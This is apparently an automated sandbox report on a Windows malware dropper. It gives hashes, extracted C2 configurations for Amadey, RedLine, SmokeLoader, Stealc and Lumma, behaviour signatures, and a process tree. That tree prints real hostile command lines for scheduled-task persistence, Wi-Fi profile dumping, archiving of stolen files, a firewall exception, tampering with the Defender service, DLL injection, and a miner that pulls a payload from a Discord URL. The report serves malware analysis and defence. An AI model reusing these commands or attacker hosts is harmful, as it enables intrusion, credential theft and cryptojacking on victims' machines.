Analysis

  • max time kernel
    441s
  • max time network
    605s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-03-2024 23:32

General

  • Target

    amert.exe

  • Size

    1.8MB

  • MD5

    b8b5138dc6f97136cfebece16f80203d

  • SHA1

    e020d3ac6d101791801e8ce8c921a5f54f78abf5

  • SHA256

    7d1e736b876ad9f4effc5736323bbb1db9d53b49abda5a13d238cbe5f56e136c

  • SHA512

    f26e295c0845b57520ee8392761c532527ca41974f68f189bb37637b45455edceb098ca23d2952e495635719a8da8a39d86d880467bc6ad79071afd870dd9877

  • SSDEEP

    49152:6Bb/umIpUjoMJSb1MFkc5eCohVvb+22WBtsDSHLjgAgtZ:6B/zI3RW6c+hVJ2OymwjZ

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.137.132:1632

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

185.172.128.33:8970

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Extracted

Family

lumma

C2

https://resergvearyinitiani.shop/api

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • DcRat 16 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect ZGRat V1 6 IoCs
  • Detected google phishing page
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 4 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • Windows security bypass 2 TTPs 7 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 34 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 17 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Mark of the Web detected: This indicates that the page was originally saved or cloned. 11 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 29 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 61 IoCs
  • Suspicious use of SendNotifyMessage 59 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\amert.exe"
    1⤵
    • DcRat
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:3436
  • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
    C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe
      "C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4944
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:5072
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4556
      • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
        "C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Accesses Microsoft Outlook profiles
        • Adds Run key to start application
        • Checks processor information in registry
        PID:3704
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
          3⤵
          • DcRat
          • Creates scheduled task(s)
          PID:5208
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
          3⤵
          • DcRat
          • Creates scheduled task(s)
          PID:7040
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_8a6496ffe392a21c6b6161ca9c2862b2\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_8a6496ffe392a21c6b6161ca9c2862b2 HR" /sc HOURLY /rl HIGHEST
          3⤵
          • DcRat
          • Creates scheduled task(s)
          PID:6440
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_8a6496ffe392a21c6b6161ca9c2862b2\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_8a6496ffe392a21c6b6161ca9c2862b2 LG" /sc ONLOGON /rl HIGHEST
          3⤵
          • DcRat
          • Creates scheduled task(s)
          PID:3488
        • C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\avErUrVmABeKd743qotM.exe
          "C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\avErUrVmABeKd743qotM.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:5660
        • C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\iFPCz5t_aBC1bWW75EzL.exe
          "C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\iFPCz5t_aBC1bWW75EzL.exe"
          3⤵
          • Checks computer location settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5668
        • C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\NJtoRntlaud7Yz4qMfYg.exe
          "C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\NJtoRntlaud7Yz4qMfYg.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Identifies Wine through registry keys
          PID:6120
        • C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\ET0E6bpJnWbYhp9RirCU.exe
          "C:\Users\Admin\AppData\Local\Temp\heidiYayG2FOEBskO\ET0E6bpJnWbYhp9RirCU.exe"
          3⤵
            PID:7264
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
          2⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:780
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
            3⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1844
            • C:\Windows\system32\netsh.exe
              netsh wlan show profiles
              4⤵
                PID:2076
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\772066395907_Desktop.zip' -CompressionLevel Optimal
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:452
          • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
            "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4284
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2768
              • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4292
              • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
                4⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4232
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1388
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 3
                  5⤵
                    PID:4592
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
              2⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              PID:4508
            • C:\Users\Admin\AppData\Local\Temp\1001022001\chckik.exe
              "C:\Users\Admin\AppData\Local\Temp\1001022001\chckik.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:2232
            • C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
              "C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
              2⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              PID:4140
              • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:2540
                • C:\Users\Admin\AppData\Local\Temp\1000022001\baran.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000022001\baran.exe"
                  4⤵
                  • Executes dropped EXE
                  • Accesses Microsoft Outlook profiles
                  • Adds Run key to start application
                  • Checks processor information in registry
                  • outlook_office_path
                  • outlook_win_path
                  PID:3664
                  • C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\jWz4VT4q72YLQLgkBpoK.exe
                    "C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\jWz4VT4q72YLQLgkBpoK.exe"
                    5⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:6380
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_fd3d4efe9bdde86504b9ef54d8c8e312\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_fd3d4efe9bdde86504b9ef54d8c8e312 HR" /sc HOURLY /rl HIGHEST
                    5⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:2912
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_fd3d4efe9bdde86504b9ef54d8c8e312\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_fd3d4efe9bdde86504b9ef54d8c8e312 LG" /sc ONLOGON /rl HIGHEST
                    5⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:6560
                  • C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\osusQHXi70taNWopUssj.exe
                    "C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\osusQHXi70taNWopUssj.exe"
                    5⤵
                    • Checks computer location settings
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2724
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_125ab8e1cad0066b89877562c7126a21\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_125ab8e1cad0066b89877562c7126a21 HR" /sc HOURLY /rl HIGHEST
                    5⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:400
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_125ab8e1cad0066b89877562c7126a21\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_125ab8e1cad0066b89877562c7126a21 LG" /sc ONLOGON /rl HIGHEST
                    5⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:6460
                  • C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\s9rNrB7EixhhRASn98NL.exe
                    "C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\s9rNrB7EixhhRASn98NL.exe"
                    5⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Identifies Wine through registry keys
                    PID:2976
                  • C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\ebGP3CPHjdYbCFfdpzt8.exe
                    "C:\Users\Admin\AppData\Local\Temp\heidi968FdkHxzKXo\ebGP3CPHjdYbCFfdpzt8.exe"
                    5⤵
                      PID:7544
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                    4⤵
                    • Loads dropped DLL
                    PID:2576
                    • C:\Windows\system32\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                      5⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      PID:4028
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profiles
                        6⤵
                          PID:780
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\772066395907_Desktop.zip' -CompressionLevel Optimal
                          6⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2504
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                      4⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      PID:2576
                • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                  "C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:5064
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe" /F
                    3⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:4256
                  • C:\Users\Admin\AppData\Local\Temp\1000180001\ISetup8.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000180001\ISetup8.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:2448
                    • C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe
                      "C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4164
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GDHIDHIEGI.exe"
                        5⤵
                          PID:5952
                          • C:\Users\Admin\AppData\Local\Temp\GDHIDHIEGI.exe
                            "C:\Users\Admin\AppData\Local\Temp\GDHIDHIEGI.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2208
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GDHIDHIEGI.exe
                              7⤵
                                PID:1104
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 2.2.2.2 -n 1 -w 3000
                                  8⤵
                                  • Runs ping.exe
                                  PID:5436
                        • C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe
                          "C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe"
                          4⤵
                          • Deletes itself
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • Suspicious use of SetWindowsHookEx
                          PID:2148
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                            5⤵
                              PID:2984
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 1251
                                6⤵
                                  PID:2804
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                  6⤵
                                  • DcRat
                                  • Creates scheduled task(s)
                                  PID:3864
                          • C:\Users\Admin\AppData\Local\Temp\1000181001\toolspub1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000181001\toolspub1.exe"
                            3⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:776
                          • C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4700
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1668
                            • C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe"
                              4⤵
                              • Windows security bypass
                              • Executes dropped EXE
                              • Windows security modification
                              • Adds Run key to start application
                              • Checks for VirtualBox DLLs, possible anti-VM trick
                              • Drops file in Windows directory
                              • Modifies data under HKEY_USERS
                              PID:2644
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                5⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2312
                              • C:\Windows\System32\cmd.exe
                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                5⤵
                                  PID:5820
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                    6⤵
                                    • Modifies Windows Firewall
                                    PID:5872
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  5⤵
                                  • Drops file in System32 directory
                                  PID:5312
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:1272
                                • C:\Windows\rss\csrss.exe
                                  C:\Windows\rss\csrss.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Manipulates WinMonFS driver.
                                  PID:2856
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    6⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    PID:3888
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                    6⤵
                                    • DcRat
                                    • Creates scheduled task(s)
                                    PID:6780
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    schtasks /delete /tn ScheduledUpdate /f
                                    6⤵
                                      PID:6888
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      PID:6932
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      PID:6508
                                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5696
                                    • C:\Windows\SYSTEM32\schtasks.exe
                                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                      6⤵
                                      • DcRat
                                      • Creates scheduled task(s)
                                      PID:4612
                                    • C:\Windows\windefender.exe
                                      "C:\Windows\windefender.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:6988
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                        7⤵
                                          PID:1432
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                            8⤵
                                            • Launches sc.exe
                                            PID:1940
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        6⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:7512
                                      • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                        C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=soothai2Aep2ohqu -m=https://cdn.discordapp.com/attachments/1220770485210710117/1220772642102054933/wVPjYUIbfZQwJs?ex=6610281e&is=65fdb31e&hm=ab675d89d9dcb78c3c9e04e8416260f60c6fc5d8ddedcab3944fe161191bb8b7& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                                        6⤵
                                          PID:5088
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 71162814-a98c-4251-99d7-67fa7c0ed358 --tls --nicehash -o showlock.net:443 --rig-id 71162814-a98c-4251-99d7-67fa7c0ed358 --tls --nicehash -o showlock.net:80 --rig-id 71162814-a98c-4251-99d7-67fa7c0ed358 --nicehash --http-port 3433 --http-access-token 71162814-a98c-4251-99d7-67fa7c0ed358 --randomx-wrmsr=-1
                                            7⤵
                                            • Suspicious use of FindShellTrayWindow
                                            PID:6248
                                          • C:\Windows\rss\csrss.exe
                                            C:\Windows\rss\csrss.exe -hide 6248
                                            7⤵
                                              PID:2892
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                8⤵
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                PID:2436
